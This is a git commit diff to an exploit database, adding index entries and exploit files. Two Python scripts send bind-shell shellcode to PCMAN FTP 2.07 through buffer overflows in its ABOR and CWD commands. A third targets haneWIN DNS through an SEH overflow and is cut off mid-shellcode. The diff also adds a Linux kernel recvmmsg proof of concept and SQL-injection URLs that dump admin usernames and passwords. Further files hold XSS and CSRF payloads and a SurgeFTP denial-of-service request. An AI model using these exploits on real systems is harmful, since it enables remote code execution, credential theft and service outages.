Updated 02_01_2014

2014-02-01 04:26:32 +00:00 · 2014-02-01 04:26:32 +00:00 · 5f29698d91
commit 5f29698d91
parent 3df1ce2164
21 changed files with 471 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -28068,7 +28068,11 @@ id,file,description,date,author,platform,type,port
 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
+31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80
 31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
+31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0
@ -28094,3 +28098,19 @@ id,file,description,date,author,platform,type,port
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
 31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module 'artid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31290,platforms/php/webapps/31290.txt,"auraCMS 2.2 'lihatberita' Module 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31291,platforms/php/webapps/31291.txt,"Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31292,platforms/php/webapps/31292.txt,"Joomla! and Mambo 'com_blog' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability",2008-02-25,-=Mizo=-,php,webapps,0
+31295,platforms/php/webapps/31295.txt,"Joomla! and Mambo 'com_wines' 1.0 Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0
+31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0
+31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0
+31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0
+31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
+31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
--- a/platforms/hardware/remote/31298.txt
+++ b/platforms/hardware/remote/31298.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27982/info
+
+Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+https://www.example.com/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E 
--- a/platforms/jsp/webapps/31299.txt
+++ b/platforms/jsp/webapps/31299.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27986/info
+
+Alkacon OpenCms is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenCms 7.0.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ 
--- a/platforms/linux/dos/31305.c
+++ b/platforms/linux/dos/31305.c
@ -0,0 +1,74 @@
+/*
+ * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage
+ *
+ * https://code.google.com/p/chromium/issues/detail?id=338594
+ *
+ * $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done
+ */
+
+#define _GNU_SOURCE
+#include <netinet/ip.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+
+int
+main(void)
+{
+#define VLEN 10
+#define BUFSIZE 200
+#define TIMEOUT 1
+    int sockfd, retval, i;
+    struct sockaddr_in sa;
+    struct mmsghdr msgs[VLEN];
+    struct iovec iovecs[VLEN];
+    char bufs[VLEN][BUFSIZE+1];
+    struct timespec timeout;
+
+    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+    if (sockfd == -1) {
+        perror("socket()");
+        exit(EXIT_FAILURE);
+    }
+
+    sa.sin_family = AF_INET;
+    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+    sa.sin_port = htons(1234);
+    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+        perror("bind()");
+        exit(EXIT_FAILURE);
+    }
+
+    memset(msgs, 0, sizeof(msgs));
+    for (i = 0; i < VLEN; i++) {
+        iovecs[i].iov_base         = bufs[i];
+        iovecs[i].iov_len          = BUFSIZE;
+        msgs[i].msg_hdr.msg_iov    = &iovecs[i];
+        msgs[i].msg_hdr.msg_iovlen = 1;
+    }
+
+    timeout.tv_sec = TIMEOUT;
+    timeout.tv_nsec = 0;
+
+//    retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);
+//    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);
+    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);
+    if (retval == -1) {
+        perror("recvmmsg()");
+        exit(EXIT_FAILURE);
+    }
+
+    printf("%d messages received\n", retval);
+    for (i = 0; i < retval; i++) {
+        bufs[i][msgs[i].msg_len] = 0;
+        printf("%d %s", i+1, bufs[i]);
+    }
+    exit(EXIT_SUCCESS);
+}
--- a/platforms/php/webapps/31256.txt
+++ b/platforms/php/webapps/31256.txt
@ -0,0 +1,48 @@
+# Exploit Title: linPHA 1.3.4 - Pemanent XSS and CSRF
+# Date: 28/01/2014
+# Exploit Author: killall-9@mail.com
+# Vendor Homepage: http://sourceforge.net/projects/linpha/
+# Software Link: http://sourceforge.net/projects/linpha/files/latest/download
+# Version: 1.3.4
+# Tested on: Virtualbox (debian) and Apache
+
+===[ Exploit ]===
+
+1) Permanent XSS=>
+.....
+POST /linpha-1.3.4/actions/submit_mod_data.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/linpha-1.3.4/admin.php?page=mysettings
+Cookie: PHPSESSID=bbdjarqpmknfpubtnc29rgodu0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 153
+
+friend_user_name=admin&friend_full_name=%3Cscript%3Ealert%28%22xss+here%22%29%3B%3C%2Fscript%3E&friend_user_mail=admin%40gmail.com&id=1&action=frienduser
+.....
+
+
+2) CSRF (poc)=>
+.....
+<html>
+<head>
+<title>Pinata-CSRF-Tool</title>
+</head>
+<body>
+<form action="http://localhost/linpha-1.3.4/admin.php?page=perms&edit=basket_mail&redirector=general" id="formid" method="post">
+<input name="who" value="2" />
+<input name="and_or" value="0" />
+<input name="alb" value="0" />
+<input name="change_permissions" value="true" />
+<input type="submit" value="Invia"/>
+</form>
+</body>
+</html>
+.....
+
+These vulnerabilities was found in the administration panel.
+cheerZ.:
--- a/platforms/php/webapps/31288.txt
+++ b/platforms/php/webapps/31288.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27956/info
+
+The Joomla! and Mambo 'com_hello_world' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/* 
--- a/platforms/php/webapps/31289.txt
+++ b/platforms/php/webapps/31289.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27957/info
+
+The Gallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Gallery 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** 
--- a/platforms/php/webapps/31290.txt
+++ b/platforms/php/webapps/31290.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27959/info
+
+auraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/** 
--- a/platforms/php/webapps/31291.txt
+++ b/platforms/php/webapps/31291.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27970/info
+
+The Joomla! and Mambo 'com_publication' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* 
--- a/platforms/php/webapps/31292.txt
+++ b/platforms/php/webapps/31292.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27971/info
+
+The 'com_blog' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION 
--- a/platforms/php/webapps/31293.txt
+++ b/platforms/php/webapps/31293.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27972/info
+
+Gary's Cookbook module for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+f
+rom%2F%2A%2A%2Fmos_users/* 
--- a/platforms/php/webapps/31294.txt
+++ b/platforms/php/webapps/31294.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27973/info
+
+The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* 
--- a/platforms/php/webapps/31295.txt
+++ b/platforms/php/webapps/31295.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27975/info
+
+The 'com_wines' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_wines&Itemid=S@BUN&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,use
+rname+from%2F%2A%2A%2Fmos_users/*
+
--- a/platforms/php/webapps/31296.txt
+++ b/platforms/php/webapps/31296.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27977/info
+
+Simple Shop component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(usernam
+e,0x3a,password)/**/from/**/jos_users/*
+
--- a/platforms/php/webapps/31297.txt
+++ b/platforms/php/webapps/31297.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27980/info
+
+The 'Sell' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 
--- a/platforms/php/webapps/31303.txt
+++ b/platforms/php/webapps/31303.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27994/info
+
+The Joomla! and Mambo 'com_inter' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user 
--- a/platforms/php/webapps/31304.txt
+++ b/platforms/php/webapps/31304.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27999/info
+
+Plume CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Plume CMS 1.2.2; other versions may be affected as well. 
+
+http://www.example.com/manager/xmedia.php?dir=theme/default/<script>alert("XSS")</script>&mode= 
--- a/platforms/windows/dos/31302.txt
+++ b/platforms/windows/dos/31302.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27993/info
+
+SurgeFTP is prone to a remote denial-of-service vulnerability because it fails to perform adequately boundary checks on user-supplied input.
+
+Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.
+
+SurgeFTP 2.3a2 is vulnerable; other versions may also be affected.
+
+GET / HTTP/1.0
+Content-Length: 2147483647
+
+boom
--- a/platforms/windows/remote/31254.py
+++ b/platforms/windows/remote/31254.py
@ -0,0 +1,66 @@
+# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
+# Date: Jan 25,2014
+# Exploit Author: Mahmod Mahajna (Mahy)
+# Version: 2.07
+# Tested on: Windows 7 sp1 x64 (english)
+# Email: m.dofo123@gmail.com
+import socket as s
+from sys import argv
+#
+if(len(argv) != 4):
+    print "USAGE: %s host <user> <password>" % argv[0]
+    exit(1)
+else:
+    #store command line arguments
+    script,host,fuser,fpass=argv
+    #vars
+    junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
+    espaddress = '\x59\x06\xbb\x76' # 76BB0659
+    nops = '\x90' * 10
+    shellcode = ( # BIND SHELL | PORT 4444
+        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
+        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+    sploit = junk+espaddress+nops+shellcode
+    #create socket
+    conn = s.socket(s.AF_INET,s.SOCK_STREAM)
+    #establish connection to server
+    conn.connect((host,21))
+    #post ftp user
+    conn.send('USER '+fuser+'\r\n')
+    #wait for response
+    uf = conn.recv(1024)
+    #post ftp password
+    conn.send('PASS '+fpass+'\r\n')
+    #wait for response
+    pf = conn.recv(1024)
+    #send ftp command with sploit
+    conn.send('ABOR '+sploit+'\r\n')
+    cf = conn.recv(1024)
+    #close connection
+    conn.close()
+    
+    
+	
--- a/platforms/windows/remote/31255.py
+++ b/platforms/windows/remote/31255.py
@ -0,0 +1,66 @@
+# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
+# Date: Jan 25,2014
+# Exploit Author: Mahmod Mahajna (Mahy)
+# Version: 2.07
+# Tested on: Windows 7 sp1 x64 (english)
+# Email: m.dofo123@gmail.com
+import socket as s
+from sys import argv
+#
+if(len(argv) != 4):
+    print "USAGE: %s host <user> <password>" % argv[0]
+    exit(1)
+else:
+    #store command line arguments
+    script,host,fuser,fpass=argv
+    #vars
+    junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
+    espaddress = '\x59\x06\xbb\x76' # 76BB0659
+    nops = '\x90' * 10
+    shellcode = ( # BIND SHELL | PORT 4444
+        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
+        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+    sploit = junk+espaddress+nops+shellcode
+    #create socket
+    conn = s.socket(s.AF_INET,s.SOCK_STREAM)
+    #establish connection to server
+    conn.connect((host,21))
+    #post ftp user
+    conn.send('USER '+fuser+'\r\n')
+    #wait for response
+    uf = conn.recv(1024)
+    #post ftp password
+    conn.send('PASS '+fpass+'\r\n')
+    #wait for response
+    pf = conn.recv(1024)
+    #send ftp command with sploit
+    conn.send('CWD '+sploit+'\r\n')
+    cf = conn.recv(1024)
+    #close connection
+    conn.close()
+    
+    
+	
--- a/platforms/windows/remote/31260.py
+++ b/platforms/windows/remote/31260.py
@ -0,0 +1,76 @@
+#!/usr/bin/python
+ 
+# Exploit Title: haneWIN DNS Server (SEH)
+# Author: Dario Estrada (dash) https://intrusionlabs.org
+# Date: 2014-01-29
+# Version: haneWIN DNS Server 1.5.3
+# Vendor Homepage: http://www.hanewin.net/
+# Vulnerable app link:http://www.hanewin.net/dns-e.htm
+# Tested on: Windows XP SP3
+# Thanks to God, to my family and all my friends for always being there
+#
+# Description:
+# A SEH overflow occurs when large amount of data is sent to the server 
+#
+import socket, sys, os, time
+ 
+usage = "\n  Usage: " + sys.argv[0] + " <host> \n"
+ 
+if len(sys.argv) < 2:
+    print usage
+    sys.exit(0)
+ 
+host = sys.argv[1]
+
+shellcode = (
+#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
+"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
+"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
+"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
+"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
+"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
+"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
+"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
+"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
+"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
+"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
+"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
+"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
+"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
+"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
+"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
+"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
+"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
+"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
+"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
+"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
+"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
+"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
+"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
